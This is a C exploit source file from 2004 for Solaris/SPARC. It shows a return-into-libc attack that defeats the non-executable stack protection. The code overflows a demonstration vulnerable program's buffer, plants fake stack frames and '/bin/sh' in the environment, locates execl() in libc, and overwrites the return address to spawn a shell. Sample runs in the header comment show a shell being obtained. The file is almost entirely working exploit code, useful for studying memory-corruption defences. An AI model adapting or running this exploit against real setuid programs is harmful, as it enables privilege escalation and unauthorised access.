/*
 * $Id: retlibc1-ex.c,v 1.4 2007/01/09 16:03:13 raptor Exp $
 *
 * retlibc1-ex.c - retlibc1.c exploit (Solaris/SPARC retlibc)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * "Stay with non exec, it keeps you honest" -- Dave Aitel (0dd)
 *
 * This fully-automated exploit demonstrates the return-into-libc technique 
 * on Solaris/SPARC architecture, to bypass the non-exec stack protection 
 * (noexec_user_stack=1 option in /etc/system). Note that we return to the
 * address of execl() - 4 (not - 8), 'cause we must skip the save instruction
 * to pass the parameters using our fake frame stored in envp.
 *
 * Thanks to Inode <inode@deadlocks.info> for his interesting research. 
 * See also http://community.core-sdi.com/~juliano/non-exec-stack-sol.html.
 *
 * Remember that to be able to predict where libc will be mapped, the exploit 
 * must be linked exactly the same as the target executable. In this case, 
 * compile with: "gcc retlibc1-ex.c -o retlibc1-ex -lc -ldl".
 *
 * bash-2.05$ uname -a
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.2
 * bash-2.05$ ./retlibc1-ex
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.9)
 * Using stack base        : 0xffbffffc
 * Using ff address        : 0xffbfff90
 * Using execl() address   : 0xff31337c
 * $ 
 *
 * bash-2.05$ uname -a
 * SunOS sparchina 5.6 Generic_105181-05 sun4c sparc SUNW,Sun_4_50
 * bash-2.05$ gcc --version
 * 2.95.3
 * bash-2.05$ ./retlibc1-ex 
 * Using SI_PLATFORM       : SUNW,Sun_4_50 (5.6)
 * Using stack base        : 0xeffffffc
 * Using ff address        : 0xefffff98
 * Using execl() address   : 0xef77949c
 * $ 
 */

#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULN 	"./retlibc1"	// the vulnerable program
#define BUF	336 + 1		// size of the evil buffer
#define FF	512 + 1		// size of the fake frame(s)
#define SHELL	"/bin/sh"	// command to be executed
#define DUMMY	0xdeadbeef	// dummy memory address

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

/* (ugly) global variables */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* 
 * add_arg(): add an argument to argv 
 */
int add_arg(char * string)
{
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);	
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char * string)
{
	int 	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;	
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}
	
	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg(void)
{
	int 	pad;
	char 	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * search(): search for a symbol inside libc
 */
int search(char *sym)
{
	int addr;

	/* search for the address of the symbol inside libc */
	if ((addr = (int)dlsym(RTLD_NEXT, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);
		exit(1);
	}

	/* check the address for the presence of a 0x0 */
	if (!((addr - 4) & 0xff) || !((addr - 4) & 0xff00) || 
	    !((addr - 4) & 0xff0000) || !((addr - 4) & 0xff000000)) {
		fprintf(stderr, "the address of %s() contains a 0x0!\n", sym);
		exit(1);
	}

	return(addr);
}

/*
 * main()
 */
int main(int argc, char **argv)
{
	char 	buf[BUF];
	char	ff1[FF], ff2[FF];
	char 	platform[256], release[256];

	int	*p;
	int 	ff_addr, shell_addr, offset, rel;
	int	plat_len, prog_len;

	/* get the stack base */
	int 	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get the address of execl() in libc */
	int	ret = search("execl");

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* fill the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* 
	 * initialize the fake frame that will be put in envp: we need 2 
	 * buffers, 'cause the third argument to execl() must be a NULL
	 */
	bzero(ff1, sizeof(ff1));
	bzero(ff2, sizeof(ff2));

	/* 
	 * saved %l registers
	 */
	p = (int *)(ff1);
	*p++ = DUMMY;		/* %l0 */
	*p++ = DUMMY;		/* %l1 */
	*p++ = DUMMY;		/* %l2 */
	*p++ = DUMMY;		/* %l3 */
	*p++ = DUMMY;		/* %l4 */
	*p++ = DUMMY;		/* %l5 */
	*p++ = DUMMY;		/* %l6 */
	*p++ = DUMMY;		/* %l7 */

	/* 
	 * saved %i registers
	 */
	*p++ = 0x42424242;	/* %i0: first arg to execl() */
	*p++ = 0x43434343;	/* %i1: second arg to execl() */
				/* %i2: third arg to execl() */
	p = (int *)(ff2);
	*p++ = DUMMY;		/* %i3 */
	*p++ = DUMMY;		/* %i4 */
	*p++ = DUMMY;		/* %i5 */
	*p++ = sb - 1000;	/* %i6: frame pointer */
	*p++ = DUMMY;		/* %i7: return address, we don't care */

	/* put fake frame and "/bin/sh" in envp, keeping padding */
	add_env(ff1);
	shell_addr = add_env(ff2);
	add_env(SHELL);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the fake frame address (envp[0]) and shell address */
	ff_addr = sb - offset + arg_len;
	shell_addr += ff_addr;

	/* set %i0 and %i1 */
	p = (int *)(ff1 + 32);
	*p++ = shell_addr;	/* %i0: first arg to execl() */
	*p++ = shell_addr;	/* %i1: second arg to execl() */

	/* set main()'s %i6 and %i7 */
	p = (int *)(buf + 328);
	*p++ = ff_addr;		/* fake frame address */
	*p++ = ret - 4;		/* return address in libc (must skip save) */

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", sb);
	fprintf(stderr, "Using ff address\t: 0x%p\n", ff_addr);
	fprintf(stderr, "Using execl() address\t: 0x%p\n", ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
}
